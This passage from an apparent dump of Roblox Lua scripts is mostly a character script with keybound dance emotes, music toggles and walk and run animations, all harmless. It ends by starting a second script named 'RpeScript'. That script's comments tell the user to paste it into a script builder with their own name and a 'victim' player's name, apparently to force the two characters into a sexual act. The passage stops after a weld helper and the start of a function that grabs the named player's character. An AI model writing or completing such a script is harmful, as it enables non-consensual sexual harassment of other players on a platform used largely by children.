  2124. hat.FormFactor = "Custom"
  2125. hat.CanCollide = false
  2126. hat.Size = head.Size
  2127. hat.Locked = true
  2128. hat:breakJoints()
  2129. local hatmesh = Instance.new("SpecialMesh", hat)
  2130. hatmesh.MeshId = "http://www.roblox.com/asset/?id=44410178"
  2131. hatmesh.TextureId = "http://www.roblox.com/asset/?id=44410320"
  2132. hatmesh.Scale = Vector3.new(.25, .25, .25)
  2133. local hatweld = Instance.new("Weld", hat)
  2134. hatweld.Part0 = hat
  2135. hatweld.Part1 = la
  2136. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  2137. end
  2138. end
  2139.  
  2140.  
  2141.  
  2142.  
  2143. if k == "q" then
  2144. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then return end
  2145. if sitting then return end
  2146. looking = true
  2147. game:GetService("Chat"):Chat(head,"I'm just tiltin",0)
  2148. rj.C0 = CFrame.new(-math.pi/6, 0,0) * CFrame.Angles(0, 0, math.pi/4)
  2149. end
  2150. if k == "e" then
  2151. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then return end
  2152. if sitting then return end
  2153. looking = true
  2154. game:GetService("Chat"):Chat(head,"What's wrong with tilting?",0)
  2155. rj.C0 = CFrame.new(math.pi/6, 0,0) * CFrame.Angles(0, 0, -math.pi/4)
  2156. end
  2157. if string.byte(k) == 48 or string.byte(k) == 47 then
  2158. if sitting then return end
  2159. humanoid.WalkSpeed = 30
  2160. end
  2161. if string.byte(k) == 52 then
  2162. if sitting then return end
  2163. humanoid.WalkSpeed = 10
  2164. end
  2165. end)
  2166.  
  2167. mouse.KeyUp:connect(function(k)
  2168. if string.byte(k) == 48 or string.byte(k) == 47 then
  2169. if sitting then return end
  2170. humanoid.WalkSpeed = 20
  2171. end
  2172. if string.byte(k) == 32 then
  2173. game:GetService("Chat"):Chat(head,"Party's over! For now...",0)
  2174. superannoying = false
  2175. barrelroll = false
  2176. heya = false
  2177. dubstepgun = false
  2178. youpirate = false
  2179. canttouch = false
  2180. gangnam = false
  2181. sheddy = false
  2182. durka = false
  2183. saxguy = false
  2184. foxie = false
  2185. burndem = false
  2186. bronymusic = false
  2187. canttt = false
  2188. brony_music:stop()
  2189. cant:Stop()
  2190. fox_say:stop()
  2191. spitfire:stop()
  2192. heman:stop()
  2193. justin:stop()
  2194. jb = false
  2195. durk:stop()
  2196. restorecolors()
  2197. burn_dem:stop()
  2198. if hat then
  2199. hat:Destroy()
  2200. end
  2201. sax_guy:stop()
  2202. gangy_style:stop()
  2203. cant_touch:stop()
  2204. you_are_pirate:stop()
  2205. dubstep_gun:stop()
  2206. super_annoying:stop()
  2207. barrel_roll:stop()
  2208. dancing = false
  2209. global_wait = 0
  2210. LightForTorso.Color = torso.BrickColor.Color
  2211. end
  2212.  
  2213.  
  2214. if k == "q" then
  2215. if looking then
  2216. if sitting then return end
  2217. rj.C0 = CFrame.new()
  2218. looking = false
  2219. end
  2220. end
  2221.  
  2222. if k == "e" then
  2223. if looking then
  2224. if sitting then return end
  2225. rj.C0 = CFrame.new()
  2226. looking = false
  2227. end
  2228. end
  2229. end)
  2230.  
  2231.  
  2232. game:service'RunService'.Stepped:connect(function()
  2233. count = (count % 100) + countspeed
  2234. angle = math.pi * math.sin(math.pi*2/100*count)
  2235.  
  2236. if slidecount < slidecountmax then
  2237. slidecount = slidecount + speed
  2238. end
  2239. if slidecount > slidecountmax then
  2240. slidecount = slidecount - speed
  2241. end
  2242. if global_wait == 380 then global_wait = 0 end
  2243.  
  2244. sine = sine + sinespeed
  2245. if not dancing then
  2246. if not sitting then
  2247. local ray = Ray.new(rootpart.Position, Vector3.new(0, -1, 0))
  2248. local hitz, enz = workspace:FindPartOnRay(ray, char)
  2249. if not hitz then
  2250. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles((math.pi/8/5*slidecount) + math.pi + angle*0.05, 0, 0)
  2251. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles((math.pi/8/5*slidecount) + math.pi + -angle*0.05, 0, 0)
  2252. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.28, 0, 0)
  2253. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.28, 0, 0)
  2254. if not looking then
  2255. rj.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  2256. end
  2257. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  2258. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 2 then
  2259.  
  2260. -- idle anim
  2261.  
  2262. anim = "Idle"
  2263. if anim ~= lastanim then
  2264. if lastanim == "Walking" then
  2265. speed = 0.5
  2266. slidecount = 1
  2267. slidecountmax = 0
  2268. elseif lastanim == "Running" then
  2269. speed = 2.5
  2270. slidecount = 5
  2271. slidecountmax = 0
  2272. else
  2273. slidecount = 0
  2274. slidecountmax = 0
  2275. end
  2276. end
  2277. countspeed = 1
  2278. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.02, 0, 0)
  2279. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.02, 0, 0)
  2280. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.01, 0, 0)
  2281. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.01, 0, 0)
  2282. if not looking then
  2283. rj.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  2284. end
  2285. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  2286. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 14 then
  2287. looking = false
  2288. -- walk anim
  2289. anim = "Walking"
  2290. if anim ~= lastanim then
  2291. speed = 0.2
  2292. slidecount = 0
  2293. slidecountmax = 1
  2294. if lastanim == "Running" then
  2295. slidecount = 5
  2296. end
  2297. end
  2298. countspeed = 6
  2299. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.3, 0, math.abs(angle*0.02))
  2300. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.3, 0, -math.abs(angle*0.02))
  2301. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.28, 0, -math.abs(angle*0.01))
  2302. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.28, 0, math.abs(angle*0.01))
  2303. rj.C0 = CFrame.new(0, math.abs(-angle*0.035), 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  2304. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  2305. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then
  2306. --run anim
  2307. anim = "Running"
  2308. if anim ~= lastanim then
  2309. speed = 1
  2310. slidecount = 0
  2311. slidecountmax = 5
  2312. if lastanim == "Walking" then
  2313. slidecount = 1
  2314. end
  2315. end
  2316.  
  2317. looking = false
  2318. countspeed = 9
  2319. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.4, 0, math.abs(angle*0.07))
  2320. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.4, 0, -math.abs(angle*0.07))
  2321. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.38, 0, -math.abs(angle*0.03))
  2322. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.38, 0, math.abs(angle*0.03))
  2323. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  2324. rj.C0 = CFrame.new(0, math.abs(-angle*.055), 0) * CFrame.Angles(-math.pi/8/5*slidecount, math.sin(angle*0.05), 0)
  2325. end
  2326.  
  2327. lastanim = anim
  2328. else
  2329. countspeed = 1
  2330. local ray = Ray.new(rootpart.Position, Vector3.new(0, -2, 0))
  2331. local hitz, enz = workspace:FindPartOnRay(ray, char)
  2332. if not hitz then
  2333. rj.C0 = CFrame.new(0, -0.5, 0) * CFrame.Angles(-math.pi/2, 0, 0)
  2334. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.rad(30), 0, -math.pi/16)
  2335. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.rad(30), 0, math.pi/16)
  2336. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.pi-math.rad(30), 0, -math.pi/10)
  2337. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.pi-math.rad(30), 0, math.pi/10)
  2338. else
  2339. rj.C0 = CFrame.new(0, -0.35, 0) * CFrame.Angles(math.rad(10), 0, 0)
  2340. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, -math.pi/16)
  2341. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, math.pi/16)
  2342. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.rad(10), 0, -math.pi/10)
  2343. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.rad(10), 0, math.pi/10)
  2344. end
  2345.  
  2346. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(angle*0.055, 0, 0)
  2347. end
  2348. else
  2349. if superannoying then
  2350. countspeed = 5
  2351. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  2352. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  2353. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2354. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2355. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2356. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  2357. elseif barrelroll then
  2358. countspeed = 5
  2359. sinespeed = 0.1
  2360. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, math.abs(angle*0.07))
  2361. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.07))
  2362. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, 0, -math.abs(angle*0.03))
  2363. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, 0, math.abs(angle*0.03))
  2364. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2365. rj.C0 = CFrame.new(math.sin(sine)*2.5, 0, 0) * CFrame.Angles(-math.pi/2, math.sin(sine)*4.5, 0)
  2366. elseif dubstepgun then
  2367. global_wait = (global_wait % 380) + 1
  2368. countspeed = 5
  2369. if global_wait < 249 - 40 then
  2370. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.27))
  2371. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.27))
  2372. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2373. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2374. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2375. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  2376. elseif global_wait > 249 - 40 then
  2377. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.4, 0, math.abs(angle*0.11))
  2378. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.11))
  2379. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.09))
  2380. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.09))
  2381. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2382. rj.C0 = CFrame.new(0, math.abs(-angle*.075), 0) * CFrame.Angles(0, math.pi/3 + math.sin(angle*0.15), 0)
  2383. end
  2384. elseif youpirate then
  2385. global_wait = (global_wait % 380) + 1
  2386. countspeed = 5
  2387. if global_wait < 79 then
  2388. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, -math.abs(angle*0.07))
  2389. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.2, 0, math.abs(angle*0.07))
  2390. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2391. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2392. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2393. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  2394. elseif global_wait < 299 then
  2395. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, math.abs(angle*0.11))
  2396. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.11))
  2397. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.2, 0, -math.abs(angle*0.1))
  2398. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.2, 0, math.abs(angle*0.1))
  2399. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), math.sin(angle*0.19), 0)
  2400. rj.C0 = CFrame.new(0, math.abs(-angle*.055+0.2), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  2401. elseif global_wait > 299 then
  2402. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, -math.abs(angle*0.07))
  2403. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.2, 0, math.abs(angle*0.07))
  2404. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2405. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2406. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2407. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  2408. end
  2409. elseif canttouch then
  2410. countspeed = 5
  2411. global_wait = (global_wait % 160) + 1
  2412. if global_wait == 160 then global_wait = 0 end
  2413. if global_wait < 39 then
  2414. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  2415. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  2416. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2417. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2418. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2419. rj.C0 = CFrame.new(0, math.abs(-angle*.03), 0) * CFrame.Angles(0, -math.pi/6, 0)
  2420. elseif global_wait < 79 then
  2421. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  2422. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  2423. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  2424. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  2425. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2426. rj.C0 = CFrame.new(0, math.abs(-angle*.03), 0) * CFrame.Angles(0, math.pi/6, 0)
  2427. elseif global_wait < 119 then
  2428. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(0.01, 0, 0.17)
  2429. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(0.01, 0, -0.17)
  2430. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), -math.abs(angle*0.06))
  2431. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), math.abs(angle*0.06))
  2432. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2433. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, 0, 0)
  2434. torso.CFrame = torso.CFrame * CFrame.new(0.05, 0, 0)
  2435. elseif global_wait > 119 then
  2436. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(0.01, 0, 0.17)
  2437. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(0.01, 0, -0.17)
  2438. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), -math.abs(angle*0.06))
  2439. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), math.abs(angle*0.06))
  2440. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2441. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, 0, 0)
  2442. torso.CFrame = torso.CFrame * CFrame.new(-0.05, 0, 0)
  2443. end
  2444. elseif gangnam then
  2445. countspeed = 5
  2446. if global_wait == 180 then global_wait = 0 end
  2447. global_wait = (global_wait % 180) + 1
  2448. if global_wait < 89 then
  2449. ls.C0 = CFrame.new(-.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, math.pi/3 + math.abs(angle*0.05))
  2450. rs.C0 = CFrame.new(.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, -math.pi/3 + -math.abs(angle*0.05))
  2451. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  2452. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  2453. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2454. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  2455. elseif global_wait > 89 then
  2456. ls.C0 = CFrame.new(-.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, math.pi/3 + math.abs(angle*0.05))
  2457. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + math.sin(angle*0.1), 0, -math.sin(angle*0.1))
  2458. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  2459. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  2460. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2461. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  2462. end
  2463. elseif foxie then
  2464. countspeed = 5
  2465. global_wait = (global_wait % 380) + 2
  2466. if global_wait < 89 then
  2467. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + math.abs(angle*0.1), 0, -math.abs(angle*0.2))
  2468. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + math.abs(angle*0.1), 0, math.abs(angle*0.2))
  2469. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  2470. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  2471. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2472. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.rad(global_wait*4), 0)
  2473. elseif global_wait > 89 then
  2474. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, math.abs(angle*0.05))
  2475. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, -math.abs(angle*0.05))
  2476. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  2477. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  2478. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, math.sin(angle*0.1))
  2479. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  2480. end
  2481. elseif durka then
  2482. countspeed = 2
  2483. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, math.abs(angle*0.07))
  2484. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.07))
  2485. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, 0, -math.abs(angle*0.03))
  2486. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, 0, math.abs(angle*0.03))
  2487. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2488. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  2489. elseif saxguy then
  2490. countspeed = 5
  2491. ls.C0 = CFrame.new(-.25,.1,-.1) * CFrame.Angles(math.pi/2.5, 0, math.pi/4)
  2492. rs.C0 = CFrame.new(.25,.1,-.1) * CFrame.Angles(math.rad(60), 0, -math.pi/4)
  2493. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, -0.06)
  2494. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, 0.06)
  2495. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(0, 0, 0)
  2496. rj.C0 = CFrame.new(0, -math.abs(angle*0.01), math.abs(angle*0.01)) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  2497. elseif heya then
  2498. countspeed = 5
  2499. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + -angle*0.2, -angle*0.1, 0)
  2500. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, angle*0.1, 0)
  2501. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  2502. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  2503. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  2504. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.sin(angle*0.07), 0)
  2505. elseif jb then
  2506. countspeed = 5
  2507. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + -angle*0.2, -angle*0.1, 0)
  2508. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, angle*0.1, 0)
  2509. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  2510. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  2511. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  2512. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  2513. elseif canttt then
  2514. countspeed = 5
  2515. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + -angle*0.2, -angle*0.1, 0)
  2516. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, angle*0.1, 0)
  2517. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  2518. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  2519. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  2520. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  2521. elseif bronymusic then
  2522. countspeed = 5
  2523. ls.C0 = CFrame.new(-.1,.1,-.15) * CFrame.Angles(math.pi/2 + -angle*0.1, -angle*0.1, 0)
  2524. rs.C0 = CFrame.new(.1,.1,-.15) * CFrame.Angles(math.pi/2 + angle*0.1, angle*0.1, 0)
  2525. lh.C0 = CFrame.new(-.1,-.25,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, 0)
  2526. rh.C0 = CFrame.new(.1,-.25,0) * CFrame.Angles(math.pi/2 + -angle*0.1, 0, 0)
  2527. neck.C0 = CFrame.new(0,.25,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.25), 0, 0)
  2528. rj.C0 = CFrame.new(0, -0.2 + math.abs(angle*0.05), 0) * CFrame.Angles(-math.rad(85), 0, 0)
  2529. elseif sheddy then
  2530. countspeed = 7
  2531. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/4 + -angle*0.4, -angle*0.1, 0)
  2532. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/4 + angle*0.4, angle*0.1, 0)
  2533. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  2534. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  2535. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  2536. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  2537. elseif burndem then
  2538. countspeed = 4
  2539. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/4 + -angle*0.4, -angle*0.1, 0)
  2540. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/4 + angle*0.4, angle*0.1, 0)
  2541. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  2542. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  2543. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  2544. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  2545. end
  2546. end
  2547. end)
  2548. plr.Chatted:connect(function(msg)
  2549. game:service'Chat':Chat(head, msg, 0)
  2550. if msg == "reset/" then
  2551. char:breakJoints()
  2552. end
  2553. if msg == "resp/" then
  2554. plr:LoadCharacter()
  2555. end
  2556. end)
  2557. end)
  2558. if not ran and err then
  2559. print(err)
  2560. end
  2561. ]]
  2562.  
  2563.  
  2564. RpeScript = [[--This ROBLOX Script Is Made By The Respected Owners.
  2565. --Script Hidden For Privacy Of The Users. Script Hidden For Privacy Of The Users.
  2566. --Username Input Is Required At The Bottom.
  2567.  
  2568. --Instructions Copy and paste into script builder,
  2569. --Put two names into "YOURNAME", and "THE VICTIM" (One of them doesn't have to be you)
  2570.  
  2571. --This Script Makes two players in your game.. Well.. I think its in the title ;D
  2572.  
  2573. ----------------------------------------------------------------------------------------
  2574. function fWeld(zName, zParent, zPart0, zPart1, zCoco, a, b, c, d, e, f)
  2575. local funcw = Instance.new("Weld")
  2576. funcw.Name = zName
  2577. funcw.Parent = zParent
  2578. funcw.Part0 = zPart0
  2579. funcw.Part1 = zPart1
  2580. if (zCoco == true) then
  2581. funcw.C0 = CFrame.new(a, b, c) * CFrame.fromEulerAnglesXYZ(d, e, f)
  2582. else
  2583. funcw.C1 = CFrame.new(a, b, c) * CFrame.fromEulerAnglesXYZ(d, e, f)
  2584. end
  2585. return funcw
  2586. end
  2587. function fun(n1, n2)
  2588. pcall(function()
  2589. t1 = game.Players[n1].Character.Torso
